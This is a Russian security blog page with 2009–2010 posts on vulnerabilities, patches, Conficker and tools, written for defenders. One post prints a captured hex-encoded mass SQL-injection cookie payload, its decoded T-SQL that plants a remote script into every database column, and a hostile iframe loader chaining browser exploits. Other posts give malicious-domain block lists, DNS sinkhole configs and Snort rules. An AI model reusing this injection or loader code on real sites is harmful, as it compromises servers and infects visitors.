РУС |  ENG
на главную  RSS
 

SecurityLab

Список блогов Текущий блог
Войти Регистрация


 Валерий МарчукЗависание Spamassasin или с Новым 2010
Казалось бы, что проблема с обработкой дат была исправлена еще 10 лет тому, когда все СМИ с ужасом описывали проблему 2000 года. Никто не мог даже представить, что 2010 год также может преподнести нам сюрприз.

Как сообщается в SA Bug 6269, правило, существующее по умолчанию, FH_DATE_PAST_20XX соответствует каждому входящему письму.

Ошибка уже устранена и должна быть доступна через sa-update.

Также многие могут наблюдать на Unix системах до конца этой недели неожиданный вывод команды date '+%G', которая до понедельника будет сообщать нам, что сейчас 2009 год.

Всех с Новым Годом
Теги: Security Постоянный адрес |  Просмотров: 368 |  Комментариев: 0


 Валерий МарчукНовые комментарии на SecurityLab.ru
Сегодня мы ввели новый интерфейс комментариев на SecurityLab.ru. Теперь каждый зарегистрированный пользователь сможет оценить комментарии других посетителей сайта. Также добавлены дополнительные опции по сокрытию комментариев. Зарегистрированные пользователи смогут скрыть комментарии с низким рейтингом и скрыть комментарии от анонимных пользователей.

Также усиливаются методы автоматического блокирования комментариев для анонимных пользователей. Все эти методы не распространяются на зарегистрированных посетителей сайта.

Мы надеемся, что новый интерфейс будет более удобным для посетителей сайта. Если у вас есть комментарии, пожелания или замечания, вы можете их изложить в этом блоге.
Теги: Сайт SecurityLab.ru Постоянный адрес |  Просмотров: 454 |  Комментариев: 8


 Валерий МарчукЗащита от 0-day в Microsoft DirectShow (обновлено v2)
Вчера мы опубликовали уведомление, описывающее уязвимость в Microsoft DirectShow MPEG2TuneRequest ActiveX компоненте. В настоящий момент уязвимость активно эксплуатируется хакерами.

Список доменов, используемых при эксплуатации уязвимости:
Код

vip762.3322.org
3b3.org
www.27pay.com
www.hao-duo.com
dump.vicp.cc
64tianwang.com
webxue38.3322.org
556622.3322.org
jfg1.3322.org
df56y.3322.org
javazhu.3322.org
8dfgdsgh.3322.org
ceewe3w2.cn
js.tongji.linezing.com
h65uj.8866.org
45hrtt.8866.org
8oy4t.8866.org
www.mjbox.com
2wdqwdqw.cn
www.vbsjs.cn
cdew32dsw.cn
qvod.y2y2dfa.cn
kan31ni.cn
www.duiguide.us
gkiot.cn
www.carloon.cn
movie.wildmansai.com
www.7iai.cn
www.jazzhigh.com
www.netcode.com
6ik76.8866.org
76ith.8866.org
qd334t.8866.org
u5hjt.8866.org
vpsvip.com
x16ake8.6600.org
www.huimzhe.cn
www.hostts.cn
ucqh.6600.org
qitamove.kmip.net
news.85580000.com
guama.9966.org
dx123.9966.org
ds355.8866.org
dnf.17xj.cn
dasda11d.cn
d212dddw.cn
ckt5.cn
ccfsdee32.cn
aaa.6sys6.cn
9owe2211.cn
8man7.3322.org
6gerere3e.cn
66yttrre.cn
45hrtt.8866.org
tongji520.com
www.google-cdma.com
443ggr.8800.org
caonimabi.r154q.cn
ckt4.cn
fdg5.cn
guama.9966.org
home.xzx6.cn
q23r.cn
wf3gr.8800.org
www.ddlse.cn
www.gamezv.com
ads.v8dc.com
www.college360.cn
name81.8u60.8u.cn
wvg7.cn
ma.o524q.cn
laibuji.w528e.cn
girlfired.d821e.cn
www.haosecc1.com.cn
ok.swfover.info
4gameranking.com
blog20fc2.com
fwefr43.cn
bybyybyb.com
wr323e2e2.cn
www.tingcao.com
www.njpfw.com
qhjjyy.7766.org
www.google-cdn.com
www.fdsdffdfsf.cn
a444.dnf5.com
www.hi2i.cn
www.xsdg.cn
19743.yfyf.net
a22.7766.org
ad.sxserve.com
al0900.cn
allmuzz.ru
andrewkim.us
asfdasfasf.3322.org
assaaa.cn
b35.info
baidu.1cznn9.com.cn
bbs.ttrpg.net
bbssifu.cn
blog.foolmountain.com
blog20fc2.com
blogs.weedns.com
buffer-ad.qvodwf.com
buhsvarna.com
by.asnfhaksfhnasf15215.cn
caonimabi.r154q.cn
ce.ceceshishi888.cn
cgi35.plala.or.jp
code.5i28.com
compcycle.org
dex.blogsite.org
down.ezua.com
dshgfh43.9966.org
dubai.2ch.net
frumin.com
haatz.tistory.com
herhun2.cech.com.cn
hosts.dnfdf.com
hzone666.com
ihaveit777.info
jjgan.9966.org
jkjjkk.cn
kjkkkk.cn
li28.vicp.net
mmsifu.cn
nbl.com.tw
ngnggg.cn
nms.asjkghajkgh15.cn
nosternos.com
orerss.3322.org
qhmm.7766.org
qhwyt.8800.org
rfsb.xicp.net
rkrkrk.9966.org
secgov.xtycoon.org
serve.sxserve.com
shell.yfyf.net
sp5201314.w11.kj400.cn
srv.v-i-e-w.net
tag.gamersabc.com
theoschepens.nl
thewifihack.com
thtttt.cn
trughtsa.com
up.hmwz.net
usrvnu.ru
usrvzi.ru
ustrania.com
uuuyyy.3322.org
uyuuuu.cn
vip.ddoshacker.cn
vipguibin22.3322.org
ww.wytzt.cn
ww2.niupan.com
www.192idc.cn
www.78195.com
www.7hacker.com
www.92shaiya.cn
www.almasto.net
www.asialoverfinder.com
www.cvskr.com
www.debonairblog.com
www.dgcft.sems.gob.mx
www.dgfdffdfs.cn
www.dgzhangfeiyijue.com
www.dubro.com
www.dztv.cn
www.funoyun.com
www.geminicarsltd.com
www.glintsun.com
www.hanrss.com
www.info-yimg.com
www.iuwei.com
www.jy-hx.cn
www.l1il.cn
www.mflian.com.cn
www.mvilcd.net
www.mysnda.com
www.nicovedeo.com
www.normb.net
www.pasch.or.at
www.qinpengejia.cn
www.samkr.com
www.tech2tech.cn
www.usssakc.com
www.uygurie.com
www.veritech.co.kr
www.ws91.cn
www.xfgh.gov.cn
www.yahoo-mail.net.ru
www.yamaill.com
www.zbea.com
x166da.6600.org
xewyny.ru
ytvccc.cn
yuyyyu.cn
zxj.3video.cn
1ive.3322.org
3wjjyy.7766.org
5x.slyip.net
66aaaaaa.com
97wyqq.8866.org
17928.yfyf.net
99813.com
www.fireofliberty.org
tt99lov.cn
ee99zz.8866.org
syweb2.71w.org
ws234.cxhost.cn
6u6u8.cncsz.net


Список второстепенных доменов, с которых скачиваются бинарники:

Код

www.73yi.cn
w1.7777ee.com
w2.7777ee.com
w3.7777ee.com
w8.7777ee.com
w9.7777ee.com
milllk.com
haha999b.com
babi2009.com
haha888l.com
xin765.com


Список IP адресов (без доменного имени), используемых в атаке:

Код

110.165.41.103
85.17.162.100


Я рекомендую администраторам заблокировать доступ к этим доменам. Доступ к доменным именам можно запретить как с помощью МСЭ, так и с помощью DNS сервера.

Блокирование доступа к доменным именам с помощью DNS сервера

Настройка BIND

Для блокирования доступа к доменным зонам создадим файл block-domains.dns следующего содержания:

Код

  $TTL    86400   ; one day

  @       IN      SOA     ns0.test.ru.
  hostmaster.test.ru. (
                          2004061000       ; serial number YYMMDDNN
                          28800   ; refresh  8 hours
                          7200    ; retry    2 hours
                          864000  ; expire  10 days
                          86400 ) ; min ttl  1 day
                  NS      ns0.test.ru.
                  NS      ns1.test.ru.

                  A       127.0.0.1

  *               IN      A       127.0.0.1



Символ * в последней строке означает, что для всех поддоменов требуемой зоны будет выдан IP адрес 127.0.0.1

Теперь в файл named.conf добавим записи интересующих нас доменных имен следующим образом:

Код

zone "evil.com" { type master;  file "/etc/namedb/block-domains.dns";};


Все записи в файле named.conf будут указывать на файл зоны block-domains.dns, который будет общим для всех блокируемых доменных зон.

Настройка Microsoft DNS

1. Создание файла зоны

Создайте в оснастке dnsmgmt.msc новую первичную DNS зону с именем, например, block-domains.com.



В результате у нас будет создан файл block-domains.com.dns. Откройте созданную вами зону и добавьте запись хоста (тип A) с именем www и IP адресом 127.0.0.1.



2. Настройка DNS сервера на использование файлов зоны

Для того, чтобы можно было проще управлять зоной, настроим DNS сервер на хранение данных в файлах вместо реестра. Выберите меню Properties для DNS сервера, перейдите на вкладку Advanced и установите тип загрузки зон при запуске (Load zone data on startup) в значение Из файла (From File).



По умолчанию на Windows 2003 файл DNS зон хранятся в %SYSTEM ROOT%/system32/dns

Файл созданной нами DNS зоны будет выглядеть следующим образом:

Код

;
;  Database file block-domains.com.dns for block-domains.com zone.
;      Zone version:  2
;
@                       IN  SOA srv-sp1.  hostmaster. (
                           2            ; serial number
                           900          ; refresh
                           600          ; retry
                           86400        ; expire
                           3600       ) ; default TTL
;
;  Zone NS records
;
@                       NS   srv-sp1.
;
;  Zone records
;
www                     A   127.0.0.1



Следует заменить в этом файле строку

Код
   www                     A   127.0.0.1


на

Код
   *            A   127.0.0.1


3. Использование файла зоны block-domains.com.dns для других зон

Данные о загрузке зон находятся в файле boot в каталоге в %SYSTEM ROOT%/system32/dns. В настоящий момент у нас там находятся следующие записи:

Код

;
;  Boot information written back by DNS server.
;
cache        .                           cache.dns
primary      block-domains.com           block-domains.com.dns


Чтобы добавить блокировку нового доменного имени, следует просто добавить соотвествующую строку в этот файл:

Код

cache        .                           cache.dns
primary      block-domains.com           block-domains.com.dns
primary      evil-domain.ru           block-domains.com.dns



После внесения изменений, перезапустите службу DNS сервера.

Правила обнаружения попыток эксплуатации уязвимости

Код

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Possible MSVIDCTL.dll exploit attempt"; flow:to_client,established; content:"|00 03 00 00 11 20 34|"; content:"|ff ff ff ff 0c 0c 0c 0c 00|"; within:70; classtype:trojan-activity; reference:url,www.securitylab.ru/vulnerability/382197.php; sid:2009493; rev:2;)


Код

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Possible MSVIDCTL.dll exploit attempt"; flow:to_client,established; content:"|00 03 00 00 11 20 34|"; content:"|ff ff ff ff 0c 0c 0c 0c 00|"; within:70; classtype:trojan-activity; reference:url,www.securitylab.ru/vulnerability/382197.php; sid:2009493; rev:2;)


Код

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Possible MSVIDCTL.dll exploit attempt"; flow:to_client,established; content:"|00 03 00 00 11 20 34|"; content:"|ff ff ff ff 0c 0c 0c 0c 00|"; within:70; classtype:trojan-activity; reference:url,www.securitylab.ru/vulnerability/382197.php; sid:2009493; rev:1;)


Код

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"Possible MSVIDCTL.dll exploit attempt"; flow:to_client,established; content:"|00 03 00 00 11 20 34|"; content:"|ff ff ff ff 0c 0c 0c 0c 00|"; within:70; classtype:trojan-activity; reference:url,www.securitylab.ru/vulnerability/382197.php; sid:2009493; rev:1;)


Я буду обновлять эту публикацию при появлении новых данных.

UPDATE 1
Обновлен список доменов

UPDATE 2 (16.07.2009)
Обновлен список доменов
Теги: Security Постоянный адрес |  Просмотров: 826 |  Комментариев: 2


 Валерий МарчукСреда без ребутов или черный день для вендоров (аналитика)
Вот уже несколько лет подряд я с нетерпением ожидаю второй вторник месяца Именно в этот вторник секюрити-сообщество просматривает уведомления безопасности и анализирует свежеиспеченные патчи. Активная работа для специалистов по безопасности продолжается и в среду (по МСК). В этот день нас порадовал не только Microsoft, устранив 14 уязвимостей в PowerPoint, но и Adobe и Apple.

Итак, начнем с Microsoft.

Мне почему-то захотелось посчитать количество времени, которое производители потратили на выпуск исправления. К сожалению, здесь цифры выглядят не так, как в рекламных баннерах и буклетах


Итого, среднее время устранения уязвимостей в PowerPoint – 255,5 дней.

Первая колонка – дата уведомления производителя о наличии уязвимости. Эта дата взята из уведомлений, выпущенных ZDI и iDefense. Давайте обратим внимание на уязвимость CVE-2009-0556 (красная заливка в таблице). Об этой уязвимости стало известно публике немного более месяца тому, когда была замечена ее эксплуатация в целевых атаках. Как видно из таблицы, ZDI сообщила об уязвимости Microsoft больше года тому, а само исправление вышло только через месяц после появления эксплоита в публичном доступе. Еще один камешек в огород Microsoft – отсутствует исправление для Microsoft Office for Mac. По этому поводу SANS даже организовало голосование, и явно осудила действия производителя. Согласно результатам, 46,8% опрошенных считают этот шаг безответственным со стороны Microsoft.

Adobe

Начало года сложно назвать удачным для этой компании в плане безопасности их продуктов. С начала года в Adobe Acrobat было устранено 8 уязвимостей, одна из которых – уязвимость нулевого дня, в Flash Player 10 было устранено 4 уязвимости.

В 2009 году вредоносные PDF файлы стали самыми распространенными в целевых атаках. По данным F-Secure 48.8% целевых атак было осуществлено с использованием PDF файлов.



По сравнению с данными за 2008 год, первенство среди целевых атак занимал Microsoft Word (34.55%).

Apple

Здесь ситуация весьма интересная. Производитель устранил 67 уязвимостей в компонентах Mac OS X. Из них 18 относятся непосредственно к продуктам Apple, остальные уязвимости - к ПО сторонних производителей. С начала года в Apple Mac OS X было обнаружено 118 уязвимостей.

Для сравнения я приведу статистику по уязвимостям в ОС за 2008 год:



Остается надеяться, что в четверг не произойдет сбой Skype «после того, как пользователи одновременно решат перезагрузить свои компьютеры после установки исправлений» и Интернет продолжит свои существование
Теги: Security Постоянный адрес |  Просмотров: 575 |  Комментариев: 0


 Валерий МарчукMicrosoft внесла изменения в уведомления MS08-069, MS08-076 и MS09-012
Вчера Microsoft внесла изменения в бюллетени безопасности MS08-069, MS08-076 и MS09-012.
MS08-069 – в список уязвимых приложений добавлены Microsoft XML Core Services 4.0 для Windows Vista SP2 и Windows Server 2008 SP2
MS08-076 – в список уязвимых приложений добавлено Windows Media Services 2008 для Windows Server 2008 SP2
MS09-012 – Добавлен Windows 2000 к списку уязвимых ОС, повторно выпущено исправление для Норвежской версии ОС.
Мы внесли соответствующие изменения в описание уязвимостей. Их можно просмотреть по адресам:
Множественные уязвимости в Microsoft XML Core Services
Несколько уязвимостей в компонентах Windows Media
Повышение привилегий в Microsoft Windows
Теги: Security Постоянный адрес |  Просмотров: 563 |  Комментариев: 0


 Валерий МарчукIE8 стал обязательным обновлением
С сегодняшнего дня Internet Explorer 8 является обязательным обновлением на сайте Windows Update и относится к высокоприоритетным установкам, как все исправления безопасности.

Пришло время IE8, и наверное это хорошо. На данный момент в IE8 не обнаружено ни одной уязвимости и это самый безопасный браузера на сегодня.

Согласно статистике SecurityLab, 9.4% посетителей все еще используют IE6, 14.3% - IE7. Судя по всему, эти цифры скоро поменяются в пользу IE8.
Теги: Software Постоянный адрес |  Просмотров: 526 |  Комментариев: 0


 Валерий МарчукПодозрительные события в Event Log: lQPxf2ISQgEV1bGK
В боге SANS опубликован интересный пост, сообщающий о необычной активности от удаленной системы с именем lQPxf2ISQgEV1bGK. События в журналах на различных системах сообщают об удачных и неудачных попытках аутентификации. Как правило, в случае удачной попытки, системе с именем lQPxf2ISQgEV1bGK предоставляются привилегии гостевой учетной записи.

Событие из event log на Windows 2003:
Цитата
security: failure - 2009/04/16 10:32:10 - Security (529) - NT AUTHORITY_SYSTEM "Logon Failure: Reason: Unknown user name or bad password User Name: Domain: WORKGROUP Logon Type: 3 Logon Process: NtLmSsp Authentication Package: NTLM Workstation Name: lQPxf2ISQgEV1bGK Caller User Name: - Caller Domain: - Caller Logon ID: - Caller Process ID: - Transited Services: - Source Network Address: 192.168.163.101 Source Port: 0"


Событие с windows 2008
Цитата
security: failure - 2009/04/16 10:31:44 - Microsoft-Windows-Security-Auditing (4625) - n/a "The description for Event ID ( 4625 ) in Source ( Microsoft-Windows-Security-Auditing ) cannot be found. The local computer may not have the necessary registry information or message DLL files to display messages from a remote computer. You may be able to use the /AUXSOURCE= flag to retrieve this description_ see Help and Support for details.


Источником события могу быть как системы, подключенные к локальной сети, так и системы из Интернет. С первого взгляда причиной подобных событий является вредоносное ПО, и скорее всего это какой-то вариант червя Conficker. Если у кто-то наблюдал подобные события в своих журналах или знает их причину - не стесняйтесь отписать, буду весьма признателен
Теги: Security Постоянный адрес |  Просмотров: 1154 |  Комментариев: 4


 Валерий МарчукНовые данные по Win32/Conficker
Jimmy Kuo, MMPC
Перевод SecurityLab.ru

За прошедшие несколько дней были осуществлены некоторые изменения на арене Conficker. Мы бы хотели сообщить всем, кому это интересно, что MMPC работает над тем, чтобы во первых, у вас были все данные, которые необходимы для защиты от любой угрозы, во вторых чтобы вы хорошо понимали саму угрозу.

Нам стало известно о двух новых бинарных файлах. Мы бы хотели сообщить, что продукты Microsoft, такие как Windows Live OneCare, Windows Live OneCare и семейство Forefront смогли определить оба новых файла по существующим сигнатурам. Обновления для Worm:Win32/Conficker.gen!B и Worm:Win32/Conficker.gen!A не требуются. Определенные словари были добавлены для новых вариантов Worm:Win32/Conficker.D и Worm:Win32/Conficker.E.

Первый экземпляр (MD5: EB0787C5B388C685B406ED46AE077536/SHA1:4887AB470FF4E49BB5F7D01331F3DF16B2BB507B) содержал минимальные изменения к существующему варианту .D. Существующие сигнатуры определили его как Worm:Win32/Conficker.gen!B. Отличия между этими версиями состоят в следующем:
Дополнения к списку приложений, которые не могут быть запущены на зараженной системе. Это относится к программам, содержащим строки:

  • bd_rem
  • cfremo
  • kill
  • stinger


Также блокируются домены содержащие строки:

  • activescan
  • adware
  • av-sc
  • bdtools
  • mitre.
  • ms-mvp
  • precisesecurity


Стоит отметить, что некоторые утилиты безопасности и сайты, которые были замечены до 1 апреля, более недоступны пользователям, зараженным новой версией червя.

Повторим еще раз, что обновления не требуются для пользователей, которые используют утилиты Microsoft.
Второй обнаруженный файл, о котором пишут многие СМИ, известен как вариант .E (MD5: 677daa8bf951ecce8eae7d7ee0301780/SHA1: 879e553b472242f3ec5a7f9698bb44cad472ff3b). Сейчас этот вариант исследуется в нашей malware research lab. Существующие сигнатуры определили его как Worm:Win32/Conficker.gen!A.

С первого взгляда, этот вариант похож на вариант .A. И к счастью, продукты Microsoft смогли определить его без каких-либо исправлений. Более глубокий анализ показал следующие результаты (напоминаем, мы все еще исследуем его, но техотличий, которые были обнаружены, стало достаточно, чтобы назвать этот новый вариант Conficker.E):

  • Эксплуатирует уязвимость MS08-067
  • Содержит код для распространения через сетевые папки
  • Помещает драйвер, как и в предыдущих версиях, используя механизм Conficker.B.
  • Открывает процесс для прослушивания web на псевдо случайном порту от 1024 до 9999, основанном на серийном номере тома системного диска.
  • Отправляет себе поток случайно сгенерированных данных перед началом работы.
  • Содержит фильтрацию по IP, используемую в Conficker.D.
  • Периодически подключается к следующим адресам для проверки подключения к Интернет:
    http://www.aol.com/
    http://www.cnn.com/
    http://www.ebay.com/
    http://www.msn.com/
    http://www.myspace.com/
  • Периодически подключается к следующим сайтам для определения своего внешнего IP адреса:
    http://checkip.dyndns.org
    http://checkip.dyndns.com
    http://www.myipaddress.com
    http://www.findmyipaddress.com
    http://www.ipaddressworld.com
    http://www.findmyip.com
    http://www.ipdragon.com
    http://www.whatsmyipaddress.com
  • Удаляет себя 3 мая 2009 года и после этой даты
  • Использует SSDP для обнаружения интернет шлюзов (маршрутизаторов) и отправляем устройству SOAP команду для открытия внешнего TCP порта и перенаправления трафика на внутренний IP:порт.
  • Размещает на системе .dll с p2p функционалом.


Помимо вех отличий, важно упомянуть о ключевой разнице между вариантом .E и предыдущими вариантами A-D. Вариант .E выполняется одновременно с существующим Conficker.D на инфицированной машине. Например, отсутствие кода для проверки ссылок для обновлений не является важной задачей, т.к. это выполняет Conficker.D.

Следить за развитием Conficker можно по адресу http://www.microsoft.com/conficker. После того, как мы опубликуем подробности по варианту .E, они будут доступны по адресу http://www.microsoft.com/security/por...onficker.E. Если будут какие-либо важные данные относительно червя, мы их опубликуем в своем блоге.

СМИ наполнены предположениями и теориями, кто и что связанно с этой активностью. Существует много уровней, которые остаются нераскрытыми. Мы бы хотели собрать все доказательства перед тем, как комментировать эти теории.
Теги: Security Постоянный адрес |  Просмотров: 2099 |  Комментариев: 0


 Валерий МарчукДоступны видеоматериалы конференции HITBSecConf2008 - Malaysia
Все желающие могут скачать и посмотреть видеоматериалы конференции HITBSecConf2008, которая проходила в Малайзии.

День первый:

http://thepiratebay.org/torrent/46545...os___Day_1

Ключевые выступления:
The Art of Click-Jacking - Jeremiah Grossman
Cyberwar is Bullshit - Marcus Ranum

Презентации:

- Delivering Identity Management 2.0 by Leveraging OPSS
- Bluepilling the Xen Hypervisor
- Pass the Hash Toolkit for Windows
- Internet Explorer 8 - Trustworthy Engineering and Browsing
- Full Process Reconsitution from Memory
- Hacking Internet Kiosks
- Analysis and Visualization of Common Packers
- A Fox in the Hen House - UPnP IGD
- MoocherHunting
- Browser Exploits: A New Model for Browser Security
- Time for a Free Hardware Foundation?
- Mac OS Xploitation
- Hacking a Bird in The Sky 2.0
- How the Leopard Hides His Spots - OS X Anti-Forensics Techniques

День второй:

http://thepiratebay.org/torrent/46549...os___Day_2

Ключевая презентация: Dissolving an Industry as a Hobby - THE PIRATE BAY

Презентации:
- Pushing the Camel Through the Eye of a Needle
- An Effective Methodology to Enable Security Evaluation at RTL Level
- Remote Code Execution Through Intel CPU Bugs
- Next Generation Reverse Shell
- Build Your Own Password Cracker with a Disassembler and VM Magic
- Decompilers and Beyond
- Cracking into Embedded Devices and Beyond!
- Client-side Security
- Top 10 Web 2.0 Attacks
Теги: Security Постоянный адрес |  Просмотров: 494 |  Комментариев: 0


 Валерий МарчукВышла новая версия Inguma 0.1.0 R1
Inguma – это бесплатный набор инструментов для проведения испытаний на проникновение и обнаружения уязвимостей. Написан полностью на python. Включает в себя модули для обнаружения хостов, сбора данных, инструменты для фаззинга, брутфорса по именам пользователей и паролям, некоторые эксплоиты и дизассемблер.



В новой версии представлены следующие нововведения:

OpenDis Binary Navigator – навигатор по исполняемым файлам
PCAP Fuzzer – утилита для сбора данных в PCAP формате и автоматического фаззинга токенов соединения.

Также добавлены модуль db2discover для обнаружения серверов IBM DB2, фаззер протокола Informix SQLEXEC, библиотека libinformix, модули tcpproxy и hexdump и многое другое.

Скачать Inguma можно по адресу: https://sourceforge.net/project/showfi..._id=650077

Блог проекта: http://ingumadev.blogspot.com/

Теги: Software Постоянный адрес |  Просмотров: 621 |  Комментариев: 0


 Валерий МарчукNmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
NMAP - легендарный сетевой сканер. Все, кто когда-либо интересовались сетевой безопасностью, пользовались и продолжают пользоваться им. Сам NMAP и его создатель Fyodor (в народе именуемый «Дядей Федей») не нуждаются в представлении.

После нескольких лет работы доступна книга Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (ISBN 978-0-9799587-1-7) – самое полное руководство по использованию nmap.



Около половины содержимого книги доступно по адресу: http://nmap.org/book/toc.html.

Мы благодарны Fyodor’у за проделанную работу и уверены, что эта книга станет настольным руководством для большинства безопасников и системных администраторов.

Презентация книги доступна на сайте http://nmap.org/book/
Теги: Security Постоянный адрес |  Просмотров: 948 |  Комментариев: 0


 Валерий МарчукMSIE 0-day теперь распространяется через SQL инъекцию (обновлено)
Мы уже много писали об уязвимости нулевого дня в Internet Explorer. В этой заметке я хочу собрать все данные в одно целое и поделиться некоторыми наблюдениями.

Публикации на тему уязвимости:
Выполнение произвольного кода в Microsoft Internet Explorer
Анализ уязвимости «нулевого дня» в Microsoft Internet Explorer
Уязвимость нулевого дня в Microsoft Internet Explorer
Эксплоит к последней уязвимости в IE7 был ошибочно опубликован в форуме
Vulnerability in Internet Explorer Could Allow Remote Code Execution (961051)
MS Internet Explorer XML Parsing Remote Buffer Overflow Exploit
MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista)

Кратко об уязвимости:

Уязвимость существует из-за ошибки в браузере при обработке XML тега. При посещении сайта, контролируемого злоумышленником, существует возможность выполнения произвольного кода на системе. По нашим данным удачная эксплуатация уязвимости происходит в 1 из 3 случаев.

Уязвимые приложения:

Microsoft Internet Explorer 6.x,
Microsoft Internet Explorer 7.x,
Microsoft Internet Explorer 8.x,
на платформах Windows XP, 2003, Vista и 2008

Как действуют злоумышленники:

Согласно полученному нами образцу лог файла, злоумышленники внедряют эксплоит на сайты, уязвимые к SQL инъекции. В этот раз инъекция эксплуатируется на через HTTP GET запрос, а через параметр ref файла куки:

Код
Cookie: ref=ef';DECLA RE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263
6861722832353529204445434C415245205461626C655F437572736F7220435552534F52
20464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F62
6A6563747320612C737973636F6C756D6E7306220776865726520612E69643D622E69642
0616E6420612E78747970653D27752720616E642028622E78747970653D3939206F72206
22E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653
D31363729204F50454E205461626C655F437572736F72204645544348204E45585420465
24F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404
046455443485F5354415455533D302920424547494E20657865632827757064617465205
B272B40542B275D20736574205B272B40432B275D3D727472696D28636F6E76657274287
66172636861722834303030292C5B272B40432B275D29292B27273C73637269707420737
2633D687474703A2F2F313767616D6F2E636F6D2F312E6A733E3C2F7363726970743E272
727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544
F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4
F43415445205461626C655F437572736F72 AS VARCHAR(4000));exec (@S);--


Декодированно как:

Код

DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
                      b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+']
   set ['+@C+']=rtrim(convert(varchar(4000),['+@C+']))+
       ''<script src=hxxp://17gamo.com/1.js></script>''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor


Как видно из кода, в страницу внедряется Javascript, загружаемый с адреса hxxp://17gamo.com/1.js:

Код

document.writeln("<script src=\"http:\/\/count48.51yes.com\/click.aspx?id=484329676&logo=1\"><\/script>");
document.write("<iframe width=100 height=0 src=http://www.17gamo.com/co/index.htm><\/iframe>");


Файл index.htm, подключаемый в качестве iframe выглядит следующим образом:
Код

<html>[CRLF]
<script>[CRLF]
document.write("<iframe width=100 height=0 src=14.htm></iframe>");[CRLF]
document.write("<iframe width=100 height=0 src=flash.htm></iframe>");[CRLF]
document.write("<iframe width=100 height=0 src=ie7.htm></iframe>");[CRLF]
try{var d;[CRLF]
var lz=new ActiveXObject("NCTAudio"+"File2.AudioFile2.2");}[CRLF]
catch(d){};                      [CRLF]
finally{if(d!="[object Error]"){document.write("<iframe width=100 height=0 src=nct.htm></iframe>");}}[CRLF]
try{var b;[CRLF]
var of=new ActiveXObject("snpvw.Snap"+"shot Viewer Control.1");}[CRLF]
catch(b){};                      [CRLF]
finally{if(b!="[object Error]"){document.write("<iframe width=100 height=0 src=office.htm></iframe>");}}[CRLF]
function Game()[CRLF]
{[CRLF]
Sameee = "IERPCtl.IERPCtl.1";[CRLF]
try[CRLF]
{[CRLF]
Gime = new ActiveXObject(Sameee);[CRLF]
}catch(error){return;}[CRLF]
Tellm = Gime.PlayerProperty("PRODUCTVERSION");[CRLF]
if(Tellm<="6.0.14.552")[CRLF]
document.write("<iframe width=100 height=0 src=real.htm></iframe>");[CRLF]
else[CRLF]
document.write("<iframe width=100 height=0 src=real.html></iframe>");[CRLF]
}[CRLF]
Game();[CRLF]
</script>[CRLF]
</html>[CRLF]


Как мы видим, злоумышленники используют уязвимости в различных версиях Flash Player, NCTAudioFile2 ActiveX компоненте (разработчик закончил поддержу ActiveX компонента, но другие производители его по прежнему активно используют), в Microsoft Internet Explorer и других приложениях.

Эксплоит к ie7.htm загружает на систему файл hxxp://www.steoo.com/admin/win.exe, который является обычным вором паролей к играм (любимое занятие китайских хакеров ).

Под данным VirusTotal, его обнаруживают следующие антивирусы:


Дополнительные данные:
Цитата

File size: 129567 bytes
MD5...: 4b1c340d2c21e02e0f59f9a490705d2e
SHA1..: 83195e6051be218e1c7ca70706e6baa8e88e169a
SHA256: e58e72e1469f116293797305bedea58b136514c686d41c7d89ca3a5c8ea76804
SHA512: f51d5f3d1da103394538aa6190b414e1306c692b341f34e86c3aa0ced95b77ba
9dfb28057cb120e4603370b03438310b3f98e39fd0298007f7872652b7cc9d69

ssdeep: 3072:EW2uSy5+X1to9fOBqRTUoMtacdqT6Tw3eA6DUp5Ju1kru1kg:H2uSy521t6
fOD1akCuw3eA6IAXf

PEiD..: Armadillo v1.71
TrID..: File type identification
Win32 Executable MS Visual C++ (generic) (65.2%)
Win32 Executable Generic (14.7%)
Win32 Dynamic Link Library (generic) (13.1%)
Generic Win/DOS Executable (3.4%)
DOS Executable Generic (3.4%)
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x402cd0
timedatestamp.....: 0x48f70ed8 (Thu Oct 16 09:52:24 2008)
machinetype.......: 0x14c (I386)

( 2 sections )
name viradd virsiz rawdsiz ntrpy md5
p 0x1000 0x2904 0x2a00 6.11 e629cbe1c4d2bc9527a41b6cc0cfdd3d
.rsrc 0x4000 0x19000 0x18200 6.30 19eb40f71e485544bb145b69468ce1cf


В данный момент неизвестно, будет ли Microsoft выпускать экстренное исправление, но мы очень на это надеемся

По данным Google эксплоит распространяется через следующие сайты:
hxxp://www.google.ru/search?hl=ru&q=17gamo.com%2F1.js&meta=

В данный момент 59 сайтов.

Желаю всем безопасного серфинга и хороших выходных!


UPDATE #1
По последним данным Microsoft на систему пользователя могут быть установлены следующие приложения:
Воры паролей:


Килогер:


Троян:


и ранее неизвестное приложение:


Диаграмма зараженности пользователей от Microsoft:


Большинство файлов с эксплоитом называются:
7.htm, I7.htm, ie07.htm, msxml.htm, and ss.htm
Теги: Security Постоянный адрес |  Просмотров: 805 |  Комментариев: 1


 Валерий МарчукЛокальный взлом Windows Vista
Компания Offensive Security опубликовала видео, демонстрирующее повышение привилегий на Windows Vista. Локальный пользователь может с помощью Live CD получить привилегии System на системе.

Using BackTrack to pwn Windows Vista

На этом видео атакующий использует LiveCD для подмены файла C:\Windows\System32\Utilman.exe файлом cmd.exe.

Utilman.exe - Windows Utility Manager, инструмент для управления пользовательскими свойствами.

